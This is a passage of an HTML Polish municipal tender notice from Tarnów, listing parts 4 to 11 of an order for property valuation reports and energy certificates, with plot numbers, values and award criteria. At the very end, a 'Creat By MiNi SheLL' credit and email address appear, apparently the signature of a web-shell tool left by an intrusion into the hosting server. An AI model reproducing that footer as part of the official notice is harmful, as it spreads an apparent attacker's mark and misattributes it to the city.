                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie nr 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie siedmiu operatów szacunkowych określających wartości rynkowe nieruchomości gruntowych położonych w Tarnowie w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.) dla wymienionych poniżej nieruchomości.
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Lp.	Nr działki	Obręb	Powierzchnia [m2]	Nr księgi wieczystej	Uwagi
1	125	253	447	Nr ksiąg wieczystych zostanie udostępniony Wykonawcy, którego oferta zostanie wybrana	
2	10/19	147	131		
	10/18		258		
	10/22		125		
	5/17		58		
3	19/3	100	2759		
4	164	74	704		
5	346/21	199	2532		podział działki na 346/93, 346/94, 346/95
6	1/13	208	12531		
	1/14		3279		
	1/15		3903		
	1/17		5355		
7	367/2	109	883		
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  8365.85<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zadanie nr 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie jednego operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej położonej w Tarnowie oznaczonej jako działka nr 96/4 obrębu 199 o powierzchni 4190 m2 (po podziale obecnie działki nr 96/8 i 96/9 obrębu 199) w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.).
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Przy dokonywaniu wyceny należy uwzględnić następującą uwagę dotyczącą sposobu wyceny zawartą w decyzji Samorządowego Kolegium Odwoławczego (sygn. akt: SKO.ZP/415/268/2014 z dnia 16 grudnia 2014 r.): dokonanie wyceny poprzez dokonanie oszacowania odrębnie terenów komunikacji dróg publicznych (lokalnych i dojazdowych), odrębnie terenów oznaczonych symbolem PU i ewentualnie odrębnie terenów oznaczonych symbolem PP.
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  1219.51<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zadanie nr 6<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie:
1) dwudziestu dziewięciu operatów szacunkowych określających wartość lokali mieszkalnych w budynkach komunalnych z wyodrębnieniem wartości udziału oddanego w użytkowanie wieczyste działek przynależnych do budynku.
Wycenie podlegają również nakłady poniesione na dany lokal, pod warunkiem uzyskania pisemnej zgody od Miejskiego Zarządu Budynków Sp. z o.o. w Tarnowie na ich poniesienie przez najemcę mieszkania. 
W operacie szacunkowym należy określić wartość lokalu mieszkalnego, wartość nakładów, wartość prawa związanego z własnością lokalu mieszkalnego oraz wartość udziału w gruncie związanego z danym lokalem mieszkalnym. Wycena sporządzana w celu sprzedaży lokali mieszkalnych na rzecz najemców wraz z własnością gruntu związanej z danym lokalem mieszkalnym,
2) dwudziestu dziewięciu świadectw charakterystyki energetycznej dla lokali mieszkalnych w budynkach komunalnych.
Wykaz lokali mieszkalnych podlegających wycenie, które wymagają sporządzenia świadectw charakterystyki energetycznej:
Lp.	Adres - ulica	Nr lokalu	Użytkowanie wieczyste/ Sprzedaż użytkowania wieczystego/ Własność gruntu
1.	Sportowa 10	7	Sprzedaż użytkowania wieczystego
2.	Ogrodowa 10	12	Sprzedaż użytkowania wieczystego
3.	Os. 25-Lecia PRL 6	24	Użytkowanie wieczyste
4.	Pułaskiego 91B	40	Użytkowanie wieczyste
5.	Szczepanika 2	58	Użytkowanie wieczyste
6.	Pułaskiego 81	105	Użytkowanie wieczyste
7.	Lwowska 61	130	Użytkowanie wieczyste
8.	Mościckiego 48	13	Użytkowanie wieczyste
9.	Pracy 4	37	Użytkowanie wieczyste
10.	Os. 25-Lecia PRL 4	22	Użytkowanie wieczyste
11.	Lwowska 42	25	Własność gruntu
12.	Skowronków 6A	76	Użytkowanie wieczyste
13.	Lelewela 3	43	Użytkowanie wieczyste
14.	Lelewela 3	15	Użytkowanie wieczyste
15.	Elektryczna 55	3	Użytkowanie wieczyste
16.	Parkowa 29	23	Użytkowanie wieczyste
17.	Pracy 4A	12	Użytkowanie wieczyste
18.	Lwowska 69	2	Użytkowanie wieczyste
19.	Os. 25-Lecia PRL 3	32	Użytkowanie wieczyste
20.	Krakowska 42	14	Użytkowanie wieczyste
21.	Mościckiego 48	4	Użytkowanie wieczyste
22.	Skowronków 6A	37	Użytkowanie wieczyste
23.	Skowronków 6A	48	Użytkowanie wieczyste
24.	Kołłątaja 15	18	Użytkowanie wieczyste
25.	Wieniawskiego 8	13	Użytkowanie wieczyste
26.	3 Maja 3	23	Użytkowanie wieczyste
27.	Pułaskiego 97	9	Użytkowanie wieczyste
28.	Krakowska 20	6A	Użytkowanie wieczyste
29.	Kołłątaja 15A	18	Użytkowanie wieczyste
Wizji na nieruchomości należy dokonać po uprzednim poinformowaniu o jej terminie najemcy lokalu.
Z wizji na nieruchomości należy sporządzić stosowny protokół.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  5658.54<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zadanie nr 7<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie jednego operatu szacunkowego określającego wartość rynkową zabudowanej parterowym domem drewnianym na podmurówce o powierzchni użytkowej 42 m2 oraz murowanym budynkiem gospodarczym o powierzchni użytkowej 19 m2, nieruchomości stanowiącej własność Gminy Miasta Tarnowa oznaczonej jako działka nr 31/2 obrębu 5 o powierzchni 109 m2 położonej przy ul. Klikowskiej w Tarnowie, objętej księgą wieczystą nr TR1T/00076042/5. Wyceniana nieruchomość przeznaczona jest do zbycia w trybie przetargu ustnego ograniczonego na poprawienie warunków zagospodarowania nieruchomości przyległych oznaczonych jako działki: nr 31/3 obrębu 5 (własność prywatna - jeden właściciel) oraz nr 32 obrębu 5 (własność prywatna - jeden właściciel). Wycenie podlega cała nieruchomość - grunt wraz zabudowaniami.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  780.49<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Zadanie nr 8<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie jednego operatu szacunkowego określającego wartość prawa użytkowania wieczystego gruntu niezabudowanej nieruchomości stanowiącej własność Skarbu Państwa oddanej w użytkowanie wieczyste Gminie Miasta Tarnowa, oznaczonej jako działka nr 155/6 obrębu 199 o powierzchni 2362 m2 położonej w rejonie ul. Kochanowskiego w Tarnowie, objętej księgą wieczystą nr TR1T/00027290/0. Na przedmiotowej działce zlokalizowane są dwa słupy wysokiego napięcia. Wycenie podlega sam grunt.
Przedmiotowa nieruchomość położona jest w terenie objętym miejscowym planem zagospodarowania przestrzennego, w którym oznaczona jest symbolem 3.PP - teren zabudowy techniczno-produkcyjnej.
Wycena jest dokonywana w celu zbycia prawa wieczystego użytkowania, jako jeden kompleks wraz z nieruchomością oznaczoną jako działka nr 355/1 obrębu 199, dla której w 2016 r. został wykonany operat szacunkowy określający wartość prawa wieczystego użytkowania.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  312.20<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Zadanie nr 9<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie jednego operatu szacunkowego określającego wartość rynkową niezabudowanej nieruchomości stanowiącej własność Gminy Miasta Tarnowa oznaczonej jako działka nr 86/11 obrębu 78 o powierzchni 918 m2 położonej przy ul. Krzyskiej w Tarnowie, objętej księgą wieczystą nr TR1T/00142908/8. Na terenie obejmującym przedmiotową nieruchomość brak jest miejscowego planu zagospodarowania przestrzennego, dla nieruchomości tej wydano natomiast dwie decyzje o warunkach zabudowy i zagospodarowania terenu na budowę:
- budynku handlowo-usługowego (usługi podstawowe) dla działki nr 86/11 obrębu 78,
- budynku mieszkalnego jednorodzinnego wolnostojącego na terenie działki nr 86/5 obrębu 78 (z której to działki została wydzielona działka 86/11) wraz z budową wjazdu na terenie obejmującym działki nr 86/5 i 86/3 obrębu 78.
Wyceniana nieruchomość przeznaczona jest do zbycia w trybie przetargu ustnego nieograniczonego.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  260.16<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Zadanie nr 10<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie jednego operatu szacunkowego określającego wartość niezabudowanych nieruchomości, wykonywanego w celu zamiany tych nieruchomości i dotyczącego:
1) nieruchomości stanowiących własność prywatną położonych w Tarnowie w obrębie ewidencyjnym 107 oznaczonych jako działki: 10/5 o powierzchni 181 m2, 9/4 o powierzchni 335 m2, 162/8 o powierzchni 54 m2, 74/2 o powierzchni 781 m2, 75/2 o powierzchni 745 m2, 77/2 o powierzchni 394 m2,
2) nieruchomości stanowiącej własność Gminy Miasta Tarnowa oznaczonej jako działka nr 99/4 obrębu 66 o powierzchni 4956 m2 objętej księgą wieczystą nr TR1T/00027172/7, na której zlokalizowane są tory kolejowe i oświetlenie nie podlegające wycenie - wycenie podlega sam grunt nieruchomości, a także wartość ustanawianej na czas nieokreślony służebności przejazdu torami kolejowym zlokalizowanymi na tej nieruchomości na rzecz każdoczesnego właściciela lub użytkownika nieruchomości objętej księgą wieczystą  TR1T/00027081/2 stanowiącej działki nr 94/2, 99/11 i 99/12 obrębu 66.
Na terenach obejmujących wyceniane nieruchomości brak jest miejscowego planu zagospodarowania przestrzennego.
Wycenie podlegają nieruchomości przeznaczone do zamiany oraz ustanawiana na jednej z nich służebność przejazdu. 
Wizji na nieruchomości należy dokonać po uprzednim poinformowaniu o jej terminie właściciela. Z wizji na nieruchomości należy sporządzić stosowny protokół.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  1105.69<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Zadanie nr 11<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie jednego operatu szacunkowego określającego wartość rynkową prawa własności lokalu użytkowego wraz z udziałem w prawie własności działek i częściach wspólnych budynku nie służących do użytku właścicieli poszczególnych lokali, stanowiącego własność osoby prywatnej. Wycena dotyczy lokalu użytkowego nr 3 o powierzchni 97,95 m2 zlokalizowanego w piwnicy budynku o adresie ul. Urszulańska 18 na działce nr 69 obrębu 252 w Tarnowie.
Budynek, w którym położony jest lokal będący przedmiotem wyceny, jest czterokondygnacyjny, w całości podpiwniczony o powierzchni użytkowej 1 420,09 m2, wielorodzinny z częścią usługową, 1-klatkowy, o konstrukcji murowanej tradycyjnej, pokryty dachem dwuspadowym o konstrukcji drewnianej z poddaszem użytkowym. Dla budynku został sporządzony projekt podziału fizycznego z wydzieleniem 13 lokali mieszkalnych i 3 lokali użytkowych. 
Z prawem własności wycenianego lokalu związany jest udział wynoszący 9795/130387 części w  częściach wspólnych budynku nie służących do użytku właścicieli poszczególnych lokali i w prawie własności działki nr 69 o powierzchni 729 m2 obrębu 252.
Wycena dokonywana jest w celu nabycia lokalu.
Wizji na nieruchomości należy dokonać po uprzednim poinformowaniu o jej terminie właściciela. Z wizji na nieruchomości należy sporządzić stosowny protokół.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  969.76<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com